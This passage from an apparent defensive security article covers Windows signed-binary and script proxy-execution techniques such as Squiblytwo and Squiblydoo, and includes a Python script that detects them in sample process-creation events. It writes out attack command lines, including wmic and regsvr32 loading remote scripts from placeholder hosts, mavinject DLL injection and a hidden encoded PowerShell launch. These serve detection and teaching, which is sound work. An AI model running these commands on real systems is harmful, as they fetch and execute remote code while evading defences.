    Another variant of this technique, called Squiblytwo, uses WMI to invoke JScript or VBScript from an XSL file. Like Squiblydoo, which abuses regsvr32.exe, this technique also relies on trusted Windows tools:
    • Local file: wmic process list /FORMAT:evil[.]xsl
    • Remote file: wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl"

    Protection recommendations: If msxsl.exe is not used in the protected environment, block its execution. Disabling WMI, on the other hand, can lead to system instability, so the consequences must be assessed beforehand.
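    The proxy-execution techniques in this part (Scripting via Office macros, Signed Binary Proxy Execution, Signed Script Proxy Execution, Trusted Developer Utilities and XSL Script Processing) all leave the same kind of trace: a trusted, signed image started with an unusual parent or with command-line arguments that point at a script, a DLL or a URL. The following is an added example (not code from the article or from MITRE) of rules over process-creation events of the shape an EDR or Sysmon Event ID 1 provides; the event records, the "benign parent" lists and the rule thresholds are constructed assumptions for illustration, and the rules are deliberately narrow so that they can be tuned against a real baseline.

```python
import re

# Constructed sample of process-creation events: image, parent image, command line.
# Paths and arguments are invented; only the shape mirrors real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mavinject.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"mavinject.exe 4120 /INJECTRUNNING C:\Users\Public\x.dll"},
    {"image": r"C:\Windows\System32\SyncAppvPublishingServer.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'SyncAppvPublishingServer.exe "n; Get-Date"'},
    {"image": r"C:\Windows\System32\cscript.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs script:http://example.invalid/"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"MSBuild.exe C:\Users\Public\build.xml"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "parent": r"C:\VS\Common7\IDE\devenv.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj"},
    {"image": r"C:\Users\Public\msxsl.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msxsl.exe customers.xml script.xsl"},
    {"image": r"C:\Windows\System32\wbem\wmic.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"wmic process list /FORMAT:C:\Users\Public\evil.xsl"},
    {"image": r"C:\Windows\System32\wbem\wmic.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"wmic process list /FORMAT:list"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"regsvr32 /s /u /i:http://example.invalid/x scrobj.dll"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Office\WINWORD.EXE",
     "cmdline": r"powershell.exe -w hidden -enc AAAA"},
    {"image": r"C:\Windows\splwow64.exe", "parent": r"C:\Office\WINWORD.EXE",
     "cmdline": r"splwow64.exe 12288"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cscript.exe", "wscript.exe", "cmd.exe", "mshta.exe"}
DEV_UTILITIES = {"msbuild.exe", "dnx.exe", "rcsi.exe", "windbg.exe", "cdb.exe", "tracker.exe"}
DEV_PARENTS = {"devenv.exe", "msbuild.exe", "vbcscompiler.exe"}  # assumption: expected parents


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names that fire on one event."""
    img, parent = basename(event["image"]), basename(event["parent"])
    cmd = event["cmdline"].lower()
    hits = []
    if img == "mavinject.exe" and "/injectrunning" in cmd:
        hits.append("signed_binary_proxy: mavinject DLL injection")
    if img == "syncappvpublishingserver.exe" and re.search(r"\bn\s*;", cmd):
        hits.append("signed_binary_proxy: SyncAppvPublishingServer with inline script")
    if img in {"cscript.exe", "wscript.exe"} and "pubprn.vbs" in cmd and "script:" in cmd:
        hits.append("signed_script_proxy: pubprn.vbs loading a remote script")
    if img in DEV_UTILITIES and parent not in DEV_PARENTS:
        hits.append(f"trusted_dev_utility: {img} outside a build/IDE session")
    if img == "msxsl.exe":
        hits.append("xsl_script_processing: msxsl.exe execution")
    if img == "wmic.exe" and "/format:" in cmd and ("http" in cmd or ".xsl" in cmd):
        hits.append("xsl_script_processing: WMIC /FORMAT with stylesheet (Squiblytwo)")
    if img == "regsvr32.exe" and ("scrobj.dll" in cmd or "/i:http" in cmd):
        hits.append("signed_binary_proxy: regsvr32 scriptlet (Squiblydoo)")
    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        hits.append(f"scripting: {parent} spawned {img} (macro?)")
    return hits


def scan(events):
    """Return (event index, rule) pairs for every rule that fires."""
    return [(i, h) for i, e in enumerate(events) for h in evaluate(e)]


if __name__ == "__main__":
    for i, rule in scan(SAMPLE_EVENTS):
        print(f"event {i}: {rule}")
```

    Events 4, 7 and 10 are the benign controls (MSBuild under Visual Studio, WMIC with the built-in list format, Word's print helper) and produce no alert; the parent-process and argument conditions are what keep the rules from firing on every legitimate use of these signed binaries, which is also why blocking the binaries outright, as the recommendations suggest, is simpler where they are not needed.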
